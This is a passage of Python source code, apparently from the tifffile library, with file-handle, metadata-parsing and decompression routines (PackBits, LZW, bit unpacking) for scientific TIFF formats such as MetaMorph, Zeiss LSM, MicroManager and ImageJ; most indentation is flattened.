* Allow to re-open closed files (for multi file formats such as OME-TIFF).
* Read numpy arrays and records from file like objects.
Only binary read, seek, tell, and close are supported on embedded files.
When initialized from another file handle, do not use it unless this
FileHandle is closed.
Attributes
----------
name : str
Name of the file.
path : str
Absolute path to file.
size : int
Size of file in bytes.
is_file : bool
        If True, file has a fileno and can be memory mapped.
All attributes are read-only.
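    Examples
    --------
    Wrapping an in-memory stream (which has no fileno and therefore cannot
    be memory mapped):
    >>> from io import BytesIO
    >>> fh = FileHandle(BytesIO(b'abcd'), name='stream')
    >>> fh.size
    4
    >>> fh.read(2) == b'ab'
    True
    >>> fh.is_file
    False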
"""
__slots__ = ('_fh', '_arg', '_mode', '_name', '_dir',
'_offset', '_size', '_close', 'is_file')
def __init__(self, arg, mode='rb', name=None, offset=None, size=None):
"""Initialize file handle from file name or another file handle.
Parameters
----------
arg : str, File, or FileHandle
File name or open file handle.
mode : str
File open mode in case 'arg' is a file name.
name : str
Optional name of file in case 'arg' is a file handle.
offset : int
Optional start position of embedded file. By default this is
the current file position.
size : int
Optional size of embedded file. By default this is the number
of bytes from the 'offset' to the end of the file.
"""
self._fh = None
self._arg = arg
self._mode = mode
self._name = name
self._dir = ''
self._offset = offset
self._size = size
self._close = True
self.is_file = False
self.open()
def open(self):
"""Open or re-open file."""
if self._fh:
return # file is open
if isinstance(self._arg, basestring):
# file name
self._arg = os.path.abspath(self._arg)
self._dir, self._name = os.path.split(self._arg)
self._fh = open(self._arg, self._mode)
self._close = True
if self._offset is None:
self._offset = 0
elif isinstance(self._arg, FileHandle):
# FileHandle
self._fh = self._arg._fh
if self._offset is None:
self._offset = 0
self._offset += self._arg._offset
self._close = False
if not self._name:
if self._offset:
name, ext = os.path.splitext(self._arg._name)
self._name = "%s@%i%s" % (name, self._offset, ext)
else:
self._name = self._arg._name
self._dir = self._arg._dir
else:
# open file object
self._fh = self._arg
if self._offset is None:
self._offset = self._arg.tell()
self._close = False
if not self._name:
try:
self._dir, self._name = os.path.split(self._fh.name)
except AttributeError:
self._name = "Unnamed stream"
if self._offset:
self._fh.seek(self._offset)
if self._size is None:
pos = self._fh.tell()
self._fh.seek(self._offset, 2)
self._size = self._fh.tell()
self._fh.seek(pos)
try:
self._fh.fileno()
self.is_file = True
except Exception:
self.is_file = False
def read(self, size=-1):
"""Read 'size' bytes from file, or until EOF is reached."""
if size < 0 and self._offset:
size = self._size
return self._fh.read(size)
def memmap_array(self, dtype, shape, offset=0, mode='r', order='C'):
"""Return numpy.memmap of data stored in file."""
if not self.is_file:
raise ValueError("Can not memory map file without fileno.")
return numpy.memmap(self._fh, dtype=dtype, mode=mode,
offset=self._offset + offset,
shape=shape, order=order)
def read_array(self, dtype, count=-1, sep=""):
"""Return numpy array from file.
Work around numpy issue #2230, "numpy.fromfile does not accept
StringIO object" https://github.com/numpy/numpy/issues/2230.
"""
try:
return numpy.fromfile(self._fh, dtype, count, sep)
except IOError:
if count < 0:
size = self._size
else:
size = count * numpy.dtype(dtype).itemsize
data = self._fh.read(size)
return numpy.fromstring(data, dtype, count, sep)
def read_record(self, dtype, shape=1, byteorder=None):
"""Return numpy record from file."""
try:
rec = numpy.rec.fromfile(self._fh, dtype, shape,
byteorder=byteorder)
except Exception:
dtype = numpy.dtype(dtype)
if shape is None:
shape = self._size // dtype.itemsize
size = product(sequence(shape)) * dtype.itemsize
data = self._fh.read(size)
return numpy.rec.fromstring(data, dtype, shape,
byteorder=byteorder)
return rec[0] if shape == 1 else rec
def tell(self):
"""Return file's current position."""
return self._fh.tell() - self._offset
def seek(self, offset, whence=0):
"""Set file's current position."""
if self._offset:
if whence == 0:
self._fh.seek(self._offset + offset, whence)
return
elif whence == 2:
self._fh.seek(self._offset + self._size + offset, 0)
return
self._fh.seek(offset, whence)
def close(self):
"""Close file."""
if self._close and self._fh:
self._fh.close()
self._fh = None
self.is_file = False
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.close()
def __getattr__(self, name):
"""Return attribute from underlying file object."""
if self._offset:
warnings.warn(
"FileHandle: '%s' not implemented for embedded files" % name)
return getattr(self._fh, name)
@property
def name(self):
return self._name
@property
def dirname(self):
return self._dir
@property
def path(self):
return os.path.join(self._dir, self._name)
@property
def size(self):
return self._size
@property
def closed(self):
return self._fh is None
def read_bytes(fh, byteorder, dtype, count):
"""Read tag data from file and return as byte string."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count).tostring()
def read_numpy(fh, byteorder, dtype, count):
"""Read tag data from file and return as numpy array."""
dtype = 'b' if dtype[-1] == 's' else byteorder+dtype[-1]
return fh.read_array(dtype, count)
def read_json(fh, byteorder, dtype, count):
"""Read JSON tag data from file and return as object."""
data = fh.read(count)
try:
return json.loads(unicode(stripnull(data), 'utf-8'))
except ValueError:
warnings.warn("invalid JSON `%s`" % data)
def read_mm_header(fh, byteorder, dtype, count):
"""Read MM_HEADER tag from file and return as numpy.rec.array."""
return fh.read_record(MM_HEADER, byteorder=byteorder)
def read_mm_stamp(fh, byteorder, dtype, count):
"""Read MM_STAMP tag from file and return as numpy.array."""
return fh.read_array(byteorder+'f8', 8)
def read_uic1tag(fh, byteorder, dtype, count, plane_count=None):
"""Read MetaMorph STK UIC1Tag from file and return as dictionary.
Return empty dictionary if plane_count is unknown.
"""
assert dtype in ('2I', '1I') and byteorder == '<'
result = {}
if dtype == '2I':
# pre MetaMorph 2.5 (not tested)
values = fh.read_array('<u4', 2*count).reshape(count, 2)
result = {'z_distance': values[:, 0] / values[:, 1]}
elif plane_count:
for i in range(count):
tagid = struct.unpack('<I', fh.read(4))[0]
if tagid in (28, 29, 37, 40, 41):
# silently skip unexpected tags
fh.read(4)
continue
name, value = read_uic_tag(fh, tagid, plane_count, offset=True)
result[name] = value
return result
def read_uic2tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC2Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 6*plane_count).reshape(plane_count, 6)
return {
'z_distance': values[:, 0] / values[:, 1],
'date_created': values[:, 2], # julian days
'time_created': values[:, 3], # milliseconds
'date_modified': values[:, 4], # julian days
'time_modified': values[:, 5], # milliseconds
}
def read_uic3tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC3Tag from file and return as dictionary."""
assert dtype == '2I' and byteorder == '<'
values = fh.read_array('<u4', 2*plane_count).reshape(plane_count, 2)
return {'wavelengths': values[:, 0] / values[:, 1]}
def read_uic4tag(fh, byteorder, dtype, plane_count):
"""Read MetaMorph STK UIC4Tag from file and return as dictionary."""
assert dtype == '1I' and byteorder == '<'
result = {}
while True:
tagid = struct.unpack('<H', fh.read(2))[0]
if tagid == 0:
break
name, value = read_uic_tag(fh, tagid, plane_count, offset=False)
result[name] = value
return result
def read_uic_tag(fh, tagid, plane_count, offset):
"""Read a single UIC tag value from file and return tag name and value.
UIC1Tags use an offset.
"""
def read_int(count=1):
value = struct.unpack('<%iI' % count, fh.read(4*count))
return value[0] if count == 1 else value
try:
name, dtype = UIC_TAGS[tagid]
except KeyError:
# unknown tag
return '_tagid_%i' % tagid, read_int()
if offset:
pos = fh.tell()
if dtype not in (int, None):
off = read_int()
if off < 8:
warnings.warn("invalid offset for uic tag '%s': %i"
% (name, off))
return name, off
fh.seek(off)
if dtype is None:
# skip
name = '_' + name
value = read_int()
elif dtype is int:
# int
value = read_int()
elif dtype is Fraction:
# fraction
value = read_int(2)
value = value[0] / value[1]
elif dtype is julian_datetime:
# datetime
value = julian_datetime(*read_int(2))
elif dtype is read_uic_image_property:
# ImagePropertyEx
value = read_uic_image_property(fh)
elif dtype is str:
# pascal string
size = read_int()
if 0 <= size < 2**10:
value = struct.unpack('%is' % size, fh.read(size))[0][:-1]
value = stripnull(value)
elif offset:
value = ''
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
elif dtype == '%ip':
# sequence of pascal strings
value = []
for i in range(plane_count):
size = read_int()
if 0 <= size < 2**10:
string = struct.unpack('%is' % size, fh.read(size))[0][:-1]
string = stripnull(string)
value.append(string)
elif offset:
warnings.warn("corrupt string in uic tag '%s'" % name)
else:
raise ValueError("invalid string size %i" % size)
else:
# struct or numpy type
dtype = '<' + dtype
if '%i' in dtype:
dtype = dtype % plane_count
if '(' in dtype:
# numpy type
value = fh.read_array(dtype, 1)[0]
if value.shape[-1] == 2:
# assume fractions
value = value[..., 0] / value[..., 1]
else:
# struct format
value = struct.unpack(dtype, fh.read(struct.calcsize(dtype)))
if len(value) == 1:
value = value[0]
if offset:
fh.seek(pos + 4)
return name, value
def read_uic_image_property(fh):
"""Read UIC ImagePropertyEx tag from file and return as dict."""
# TODO: test this
size = struct.unpack('B', fh.read(1))[0]
name = struct.unpack('%is' % size, fh.read(size))[0][:-1]
flags, prop = struct.unpack('<IB', fh.read(5))
if prop == 1:
        value = struct.unpack('<II', fh.read(8))  # little-endian rational
value = value[0] / value[1]
else:
size = struct.unpack('B', fh.read(1))[0]
value = struct.unpack('%is' % size, fh.read(size))[0]
return dict(name=name, flags=flags, value=value)
def read_cz_lsm_info(fh, byteorder, dtype, count):
"""Read CS_LSM_INFO tag from file and return as numpy.rec.array."""
assert byteorder == '<'
magic_number, structure_size = struct.unpack('<II', fh.read(8))
if magic_number not in (50350412, 67127628):
raise ValueError("not a valid CS_LSM_INFO structure")
fh.seek(-8, 1)
if structure_size < numpy.dtype(CZ_LSM_INFO).itemsize:
# adjust structure according to structure_size
cz_lsm_info = []
size = 0
for name, dtype in CZ_LSM_INFO:
size += numpy.dtype(dtype).itemsize
if size > structure_size:
break
cz_lsm_info.append((name, dtype))
else:
cz_lsm_info = CZ_LSM_INFO
return fh.read_record(cz_lsm_info, byteorder=byteorder)
def read_cz_lsm_floatpairs(fh):
"""Read LSM sequence of float pairs from file and return as list."""
size = struct.unpack('<i', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_positions(fh):
"""Read LSM positions from file and return as list."""
size = struct.unpack('<I', fh.read(4))[0]
return fh.read_array('<2f8', count=size)
def read_cz_lsm_time_stamps(fh):
"""Read LSM time stamps from file and return as list."""
size, count = struct.unpack('<ii', fh.read(8))
if size != (8 + 8 * count):
raise ValueError("lsm_time_stamps block is too short")
# return struct.unpack('<%dd' % count, fh.read(8*count))
return fh.read_array('<f8', count=count)
def read_cz_lsm_event_list(fh):
"""Read LSM events from file and return as list of (time, type, text)."""
count = struct.unpack('<II', fh.read(8))[1]
events = []
while count > 0:
esize, etime, etype = struct.unpack('<IdI', fh.read(16))
etext = stripnull(fh.read(esize - 16))
events.append((etime, etype, etext))
count -= 1
return events
def read_cz_lsm_scan_info(fh):
"""Read LSM scan information from file and return as Record."""
block = Record()
blocks = [block]
unpack = struct.unpack
if 0x10000000 != struct.unpack('<I', fh.read(4))[0]:
# not a Recording sub block
raise ValueError("not a lsm_scan_info structure")
fh.read(8)
while True:
entry, dtype, size = unpack('<III', fh.read(12))
if dtype == 2:
# ascii
value = stripnull(fh.read(size))
elif dtype == 4:
# long
value = unpack('<i', fh.read(4))[0]
elif dtype == 5:
# rational
value = unpack('<d', fh.read(8))[0]
else:
value = 0
if entry in CZ_LSM_SCAN_INFO_ARRAYS:
blocks.append(block)
name = CZ_LSM_SCAN_INFO_ARRAYS[entry]
newobj = []
setattr(block, name, newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_STRUCTS:
blocks.append(block)
newobj = Record()
block.append(newobj)
block = newobj
elif entry in CZ_LSM_SCAN_INFO_ATTRIBUTES:
name = CZ_LSM_SCAN_INFO_ATTRIBUTES[entry]
setattr(block, name, value)
elif entry == 0xffffffff:
# end sub block
block = blocks.pop()
else:
# unknown entry
setattr(block, "entry_0x%x" % entry, value)
if not blocks:
break
return block
def read_nih_image_header(fh, byteorder, dtype, count):
"""Read NIH_IMAGE_HEADER tag from file and return as numpy.rec.array."""
a = fh.read_record(NIH_IMAGE_HEADER, byteorder=byteorder)
a = a.newbyteorder(byteorder)
a.xunit = a.xunit[:a._xunit_len]
a.um = a.um[:a._um_len]
return a
def read_micromanager_metadata(fh):
"""Read MicroManager non-TIFF settings from open file and return as dict.
The settings can be used to read image data without parsing the TIFF file.
Raise ValueError if file does not contain valid MicroManager metadata.
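    A hypothetical call on an open MicroManager file ('mm.tif' is an assumed
    name; skipped in doctests):
    >>> with open('mm.tif', 'rb') as fh:  # doctest: +SKIP
    ...     meta = read_micromanager_metadata(fh)
    ...     index_map = meta['index_map']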
"""
fh.seek(0)
try:
byteorder = {b'II': '<', b'MM': '>'}[fh.read(2)]
    except (IndexError, KeyError):
raise ValueError("not a MicroManager TIFF file")
results = {}
fh.seek(8)
(index_header, index_offset, display_header, display_offset,
comments_header, comments_offset, summary_header, summary_length
) = struct.unpack(byteorder + "IIIIIIII", fh.read(32))
if summary_header != 2355492:
raise ValueError("invalid MicroManager summary_header")
results['summary'] = read_json(fh, byteorder, None, summary_length)
if index_header != 54773648:
raise ValueError("invalid MicroManager index_header")
fh.seek(index_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 3453623:
raise ValueError("invalid MicroManager index_header")
data = struct.unpack(byteorder + "IIIII"*count, fh.read(20*count))
results['index_map'] = {
'channel': data[::5], 'slice': data[1::5], 'frame': data[2::5],
'position': data[3::5], 'offset': data[4::5]}
if display_header != 483765892:
raise ValueError("invalid MicroManager display_header")
fh.seek(display_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 347834724:
raise ValueError("invalid MicroManager display_header")
results['display_settings'] = read_json(fh, byteorder, None, count)
if comments_header != 99384722:
raise ValueError("invalid MicroManager comments_header")
fh.seek(comments_offset)
header, count = struct.unpack(byteorder + "II", fh.read(8))
if header != 84720485:
raise ValueError("invalid MicroManager comments_header")
results['comments'] = read_json(fh, byteorder, None, count)
return results
def imagej_metadata(data, bytecounts, byteorder):
"""Return dict from ImageJ metadata tag value."""
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
def read_string(data, byteorder):
return _str(stripnull(data[0 if byteorder == '<' else 1::2]))
def read_double(data, byteorder):
return struct.unpack(byteorder+('d' * (len(data) // 8)), data)
def read_bytes(data, byteorder):
#return struct.unpack('b' * len(data), data)
return numpy.fromstring(data, 'uint8')
metadata_types = { # big endian
b'info': ('info', read_string),
b'labl': ('labels', read_string),
b'rang': ('ranges', read_double),
b'luts': ('luts', read_bytes),
b'roi ': ('roi', read_bytes),
b'over': ('overlays', read_bytes)}
metadata_types.update( # little endian
dict((k[::-1], v) for k, v in metadata_types.items()))
if not bytecounts:
raise ValueError("no ImageJ metadata")
if not data[:4] in (b'IJIJ', b'JIJI'):
raise ValueError("invalid ImageJ metadata")
header_size = bytecounts[0]
if header_size < 12 or header_size > 804:
raise ValueError("invalid ImageJ metadata header size")
ntypes = (header_size - 4) // 8
header = struct.unpack(byteorder+'4sI'*ntypes, data[4:4+ntypes*8])
pos = 4 + ntypes * 8
counter = 0
result = {}
for mtype, count in zip(header[::2], header[1::2]):
values = []
name, func = metadata_types.get(mtype, (_str(mtype), read_bytes))
for _ in range(count):
counter += 1
pos1 = pos + bytecounts[counter]
values.append(func(data[pos:pos1], byteorder))
pos = pos1
result[name.strip()] = values[0] if count == 1 else values
return result
def imagej_description(description):
"""Return dict from ImageJ image_description tag."""
def _bool(val):
return {b'true': True, b'false': False}[val.lower()]
_str = str if sys.version_info[0] < 3 else lambda x: str(x, 'cp1252')
result = {}
for line in description.splitlines():
try:
key, val = line.split(b'=')
except Exception:
continue
key = key.strip()
val = val.strip()
for dtype in (int, float, _bool, _str):
try:
val = dtype(val)
break
except Exception:
pass
result[_str(key)] = val
return result
def _replace_by(module_function, package=None, warn=False):
"""Try replace decorated function by module.function.
This is used to replace local functions with functions from another
(usually compiled) module, if available.
Parameters
----------
module_function : str
Module and function path string (e.g. numpy.ones)
package : str, optional
The parent package of the module
warn : bool, optional
Whether to warn when wrapping fails
Returns
-------
func : function
Wrapped function, hopefully calling a function in another module.
Example
-------
>>> @_replace_by('_tifffile.decodepackbits')
... def decodepackbits(encoded):
... raise NotImplementedError
"""
def decorate(func, module_function=module_function, warn=warn):
try:
modname, function = module_function.split('.')
if package is None:
full_name = modname
else:
full_name = package + '.' + modname
            module = __import__(full_name, fromlist=[modname])
func, oldfunc = getattr(module, function), func
globals()['__old_' + func.__name__] = oldfunc
except Exception:
if warn:
warnings.warn("failed to import %s" % module_function)
return func
return decorate
def decodejpg(encoded, tables=b'', photometric=None,
ycbcr_subsampling=None, ycbcr_positioning=None):
"""Decode JPEG encoded byte string (using _czifile extension module)."""
import _czifile
image = _czifile.decodejpg(encoded, tables)
if photometric == 'rgb' and ycbcr_subsampling and ycbcr_positioning:
# TODO: convert YCbCr to RGB
pass
return image.tostring()
@_replace_by('_tifffile.decodepackbits')
def decodepackbits(encoded):
"""Decompress PackBits encoded byte string.
PackBits is a simple byte-oriented run-length compression scheme.
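    Examples
    --------
    A replicate run followed by a literal run (values adapted from the
    TIFF 6.0 PackBits example):
    >>> encoded = b'\\xfe\\xaa\\x02\\x80\\x00\\x2a'
    >>> decodepackbits(encoded) == b'\\xaa\\xaa\\xaa\\x80\\x00\\x2a'
    True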
"""
func = ord if sys.version[0] == '2' else lambda x: x
result = []
result_extend = result.extend
i = 0
try:
while True:
n = func(encoded[i]) + 1
i += 1
if n < 129:
result_extend(encoded[i:i+n])
i += n
elif n > 129:
result_extend(encoded[i:i+1] * (258-n))
i += 1
except IndexError:
pass
return b''.join(result) if sys.version[0] == '2' else bytes(result)
@_replace_by('_tifffile.decodelzw')
def decodelzw(encoded):
"""Decompress LZW (Lempel-Ziv-Welch) encoded TIFF strip (byte string).
The strip must begin with a CLEAR code and end with an EOI code.
This is an implementation of the LZW decoding algorithm described in (1).
It is not compatible with old style LZW compressed files like quad-lzw.tif.
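    Examples
    --------
    A minimal strip: CLEAR (256), the single literal byte 0x41, and EOI
    (257), packed as 9-bit codes:
    >>> decodelzw(b'\\x80\\x10\\x60\\x20') == b'A'
    True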
"""
len_encoded = len(encoded)
bitcount_max = len_encoded * 8
unpack = struct.unpack
if sys.version[0] == '2':
newtable = [chr(i) for i in range(256)]
else:
newtable = [bytes([i]) for i in range(256)]
newtable.extend((0, 0))
def next_code():
"""Return integer of `bitw` bits at `bitcount` position in encoded."""
start = bitcount // 8
s = encoded[start:start+4]
try:
code = unpack('>I', s)[0]
except Exception:
code = unpack('>I', s + b'\x00'*(4-len(s)))[0]
code <<= bitcount % 8
code &= mask
return code >> shr
switchbitch = { # code: bit-width, shr-bits, bit-mask
255: (9, 23, int(9*'1'+'0'*23, 2)),
511: (10, 22, int(10*'1'+'0'*22, 2)),
1023: (11, 21, int(11*'1'+'0'*21, 2)),
2047: (12, 20, int(12*'1'+'0'*20, 2)), }
bitw, shr, mask = switchbitch[255]
bitcount = 0
if len_encoded < 4:
raise ValueError("strip must be at least 4 characters long")
if next_code() != 256:
raise ValueError("strip must begin with CLEAR code")
code = 0
oldcode = 0
result = []
result_append = result.append
while True:
code = next_code() # ~5% faster when inlining this function
bitcount += bitw
if code == 257 or bitcount >= bitcount_max: # EOI
break
if code == 256: # CLEAR
table = newtable[:]
table_append = table.append
lentable = 258
bitw, shr, mask = switchbitch[255]
code = next_code()
bitcount += bitw
if code == 257: # EOI
break
result_append(table[code])
else:
if code < lentable:
decoded = table[code]
newcode = table[oldcode] + decoded[:1]
else:
newcode = table[oldcode]
newcode += newcode[:1]
decoded = newcode
result_append(decoded)
table_append(newcode)
lentable += 1
oldcode = code
if lentable in switchbitch:
bitw, shr, mask = switchbitch[lentable]
if code != 257:
warnings.warn("unexpected end of lzw stream (code %i)" % code)
return b''.join(result)
@_replace_by('_tifffile.unpackints')
def unpackints(data, dtype, itemsize, runlen=0):
"""Decompress byte string to array of integers of any bit size <= 32.
Parameters
----------
data : byte str
Data to decompress.
dtype : numpy.dtype or str
A numpy boolean or integer type.
itemsize : int
Number of bits per integer.
runlen : int
Number of consecutive integers, after which to start at next byte.
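    Examples
    --------
    Unpack four 4-bit integers from two bytes:
    >>> print(unpackints(b'\\x90\\x12', 'uint8', 4, 4))
    [9 0 1 2]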
"""
if itemsize == 1: # bitarray
data = numpy.fromstring(data, '|B')
data = numpy.unpackbits(data)
if runlen % 8:
data = data.reshape(-1, runlen + (8 - runlen % 8))
data = data[:, :runlen].reshape(-1)
return data.astype(dtype)
dtype = numpy.dtype(dtype)
if itemsize in (8, 16, 32, 64):
return numpy.fromstring(data, dtype)
if itemsize < 1 or itemsize > 32:
raise ValueError("itemsize out of range: %i" % itemsize)
if dtype.kind not in "biu":
raise ValueError("invalid dtype")
itembytes = next(i for i in (1, 2, 4, 8) if 8 * i >= itemsize)
if itembytes != dtype.itemsize:
raise ValueError("dtype.itemsize too small")
if runlen == 0:
runlen = len(data) // itembytes
skipbits = runlen*itemsize % 8
if skipbits:
skipbits = 8 - skipbits
shrbits = itembytes*8 - itemsize
bitmask = int(itemsize*'1'+'0'*shrbits, 2)
dtypestr = '>' + dtype.char # dtype always big endian?
unpack = struct.unpack
l = runlen * (len(data)*8 // (runlen*itemsize + skipbits))
result = numpy.empty((l, ), dtype)
bitcount = 0
for i in range(len(result)):
start = bitcount // 8
s = data[start:start+itembytes]
try:
code = unpack(dtypestr, s)[0]
except Exception:
code = unpack(dtypestr, s + b'\x00'*(itembytes-len(s)))[0]
code <<= bitcount % 8
code &= bitmask
result[i] = code >> shrbits
bitcount += itemsize
if (i+1) % runlen == 0:
bitcount += skipbits
return result
def unpackrgb(data, dtype='<B', bitspersample=(5, 6, 5), rescale=True):
"""Return array from byte string containing packed samples.
Use to unpack RGB565 or RGB555 to RGB888 format.
Parameters
----------
data : byte str
The data to be decoded. Samples in each pixel are stored consecutively.
Pixels are aligned to 8, 16, or 32 bit boundaries.
dtype : numpy.dtype
The sample data type. The byteorder applies also to the data stream.
bitspersample : tuple
Number of bits for each sample in a pixel.
rescale : bool
Upscale samples to the number of bits in dtype.
Returns
-------
result : ndarray
Flattened array of unpacked samples of native dtype.
Examples
--------
>>> data = struct.pack('BBBB', 0x21, 0x08, 0xff, 0xff)
>>> print(unpackrgb(data, '<B', (5, 6, 5), False))
[ 1 1 1 31 63 31]
>>> print(unpackrgb(data, '<B', (5, 6, 5)))
[ 8 4 8 255 255 255]
>>> print(unpackrgb(data, '<B', (5, 5, 5)))
[ 16 8 8 255 255 255]
"""
dtype = numpy.dtype(dtype)
bits = int(numpy.sum(bitspersample))
if not (bits <= 32 and all(i <= dtype.itemsize*8 for i in bitspersample)):
raise ValueError("sample size not supported %s" % str(bitspersample))
dt = next(i for i in 'BHI' if numpy.dtype(i).itemsize*8 >= bits)
data = numpy.fromstring(data, dtype.byteorder+dt)
result = numpy.empty((data.size, len(bitspersample)), dtype.char)
for i, bps in enumerate(bitspersample):
t = data >> int(numpy.sum(bitspersample[i+1:]))
t &= int('0b'+'1'*bps, 2)
if rescale:
o = ((dtype.itemsize * 8) // bps + 1) * bps
if o > data.dtype.itemsize * 8:
t = t.astype('I')
t *= (2**o - 1) // (2**bps - 1)
t //= 2**(o - (dtype.itemsize * 8))
result[:, i] = t
return result.reshape(-1)
def reorient(image, orientation):
"""Return reoriented view of image array.
Parameters
----------
image : numpy array
Non-squeezed output of asarray() functions.
Axes -3 and -2 must be image length and width respectively.
orientation : int or str
One of TIFF_ORIENTATIONS keys or values.
"""
o = TIFF_ORIENTATIONS.get(orientation, orientation)
if o == 'top_left':
return image
elif o == 'top_right':
return image[..., ::-1, :]
elif o == 'bottom_left':
return image[..., ::-1, :, :]
elif o == 'bottom_right':
return image[..., ::-1, ::-1, :]
elif o == 'left_top':
return numpy.swapaxes(image, -3, -2)
elif o == 'right_top':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :]
elif o == 'left_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, :, :]
elif o == 'right_bottom':
return numpy.swapaxes(image, -3, -2)[..., ::-1, ::-1, :]
def squeeze_axes(shape, axes, skip='XY'):
"""Return shape and axes with single-dimensional entries removed.
Remove unused dimensions unless their axes are listed in 'skip'.
>>> squeeze_axes((5, 1, 2, 1, 1), 'TZYXC')
((5, 2, 1), 'TYX')
"""
if len(shape) != len(axes):
raise ValueError("dimensions of axes and shape don't match")
shape, axes = zip(*(i for i in zip(shape, axes)
if i[0] > 1 or i[1] in skip))
return shape, ''.join(axes)
def transpose_axes(data, axes, asaxes='CTZYX'):
"""Return data with its axes permuted to match specified axes.
A view is returned if possible.
>>> transpose_axes(numpy.zeros((2, 3, 4, 5)), 'TYXC', asaxes='CTZYX').shape
(5, 2, 1, 3, 4)
"""
for ax in axes:
if ax not in asaxes:
raise ValueError("unknown axis %s" % ax)
# add missing axes to data
shape = data.shape
for ax in reversed(asaxes):
if ax not in axes:
axes = ax + axes
shape = (1,) + shape
data = data.reshape(shape)
# transpose axes
data = data.transpose([axes.index(ax) for ax in asaxes])
return data
def stack_pages(pages, memmap=False, *args, **kwargs):
"""Read data from sequence of TiffPage and stack them vertically.
If memmap is True, return an array stored in a binary file on disk.
    Additional parameters are passed to the page asarray function.
"""
if len(pages) == 0:
raise ValueError("no pages")
if len(pages) == 1:
return pages[0].asarray(memmap=memmap, *args, **kwargs)
result = pages[0].asarray(*args, **kwargs)
shape = (len(pages),) + result.shape
if memmap:
with tempfile.NamedTemporaryFile() as fh:
result = numpy.memmap(fh, dtype=result.dtype, shape=shape)
else:
result = numpy.empty(shape, dtype=result.dtype)
for i, page in enumerate(pages):
result[i] = page.asarray(*args, **kwargs)
return result
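# Usage sketch for stack_pages, assuming a multi-page file named
# 'multipage.tif' exists (the filename is hypothetical):
#
#   with TiffFile('multipage.tif') as tif:
#       volume = stack_pages(tif.pages, memmap=True)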
def stripnull(string):
"""Return string truncated at first null character.
Clean NULL terminated C strings.
>>> stripnull(b'string\\x00') # doctest: +SKIP
b'string'
"""
i = string.find(b'\x00')
return string if (i < 0) else string[:i]
def stripascii(string):
"""Return string truncated at last byte that is 7bit ASCII.
Clean NULL separated and terminated TIFF strings.
>>> stripascii(b'string\\x00string\\n\\x01\\x00') # doctest: +SKIP
b'string\\x00string\\n'
>>> stripascii(b'\\x00') # doctest: +SKIP
b''
"""
# TODO: pythonize this
ord_ = ord if sys.version_info[0] < 3 else lambda x: x
i = len(string)
while i:
i -= 1
if 8 < ord_(string[i]) < 127:
break
else:
i = -1
return string[:i+1]
def format_size(size):
"""Return file size as string from byte size."""
for unit in ('B', 'KB', 'MB', 'GB', 'TB'):
if size < 2048:
return "%.f %s" % (size, unit)
size /= 1024.0
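# For example, format_size(1234567) returns '1206 KB' and
# format_size(5 * 2**30) returns '5 GB'.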
def sequence(value):
"""Return tuple containing value if value is not a sequence.
>>> sequence(1)
(1,)
>>> sequence([1])
[1]
"""
try:
len(value)
return value
except TypeError:
return (value, )
def product(iterable):
"""Return product of sequence of numbers.
Equivalent of functools.reduce(operator.mul, iterable, 1).
>>> product([2**8, 2**30])
274877906944
>>> product([])
1
"""
prod = 1
for i in iterable:
prod *= i
return prod
def natural_sorted(iterable):
"""Return human sorted list of strings.
E.g. for sorting file names.
>>> natural_sorted(['f1', 'f2', 'f10'])
['f1', 'f2', 'f10']
"""
def sortkey(x):
return [(int(c) if c.isdigit() else c) for c in re.split(numbers, x)]
numbers = re.compile(r'(\d+)')
return sorted(iterable, key=sortkey)
def excel_datetime(timestamp, epoch=datetime.datetime.fromordinal(693594)):
"""Return datetime object from timestamp in Excel serial format.
Convert LSM time stamps.
>>> excel_datetime(40237.029999999795)
datetime.datetime(2010, 2, 28, 0, 43, 11, 999982)
"""
return epoch + datetime.timedelta(timestamp)
def julian_datetime(julianday, milisecond=0):
"""Return datetime from days since 1/1/4713 BC and ms since midnight.
Convert Julian dates according to MetaMorph.
>>> julian_datetime(2451576, 54362783)
datetime.datetime(2000, 2, 2, 15, 6, 2, 783)
"""
if julianday <= 1721423:
# no datetime before year 1
return None
a = julianday + 1
if a > 2299160:
alpha = math.trunc((a - 1867216.25) / 36524.25)
a += 1 + alpha - alpha // 4
b = a + (1524 if a > 1721423 else 1158)
c = math.trunc((b - 122.1) / 365.25)
d = math.trunc(365.25 * c)
e = math.trunc((b - d) / 30.6001)
day = b - d - math.trunc(30.6001 * e)
month = e - (1 if e < 13.5 else 13)
year = c - (4716 if month > 2.5 else 4715)
hour, milisecond = divmod(milisecond, 1000 * 60 * 60)
minute, milisecond = divmod(milisecond, 1000 * 60)
second, milisecond = divmod(milisecond, 1000)
return datetime.datetime(year, month, day,
hour, minute, second, milisecond)
def test_tifffile(directory='testimages', verbose=True):
"""Read all images in directory.
Print error message on failure.
>>> test_tifffile(verbose=False)
"""
successful = 0
failed = 0
start = time.time()
for f in glob.glob(os.path.join(directory, '*.*')):
if verbose:
print("\n%s>\n" % f.lower(), end='')
t0 = time.time()
try:
tif = TiffFile(f, multifile=True)
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
try:
img = tif.asarray()
except ValueError:
try:
img = tif[0].asarray()
except Exception as e:
if not verbose:
print(f, end=' ')
print("ERROR:", e)
failed += 1
continue
finally:
tif.close()
successful += 1
if verbose:
print("%s, %s %s, %s, %.0f ms" % (
str(tif), str(img.shape), img.dtype, tif[0].compression,
(time.time()-t0) * 1e3))
if verbose:
print("\nSuccessfully read %i of %i files in %.3f s\n" % (
successful, successful+failed, time.time()-start))
class TIFF_SUBFILE_TYPES(object):
def __getitem__(self, key):
result = []
if key & 1:
result.append('reduced_image')
if key & 2:
result.append('page')
if key & 4:
result.append('mask')
return tuple(result)
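# Illustrative example: the bit flags decode to a tuple of names,
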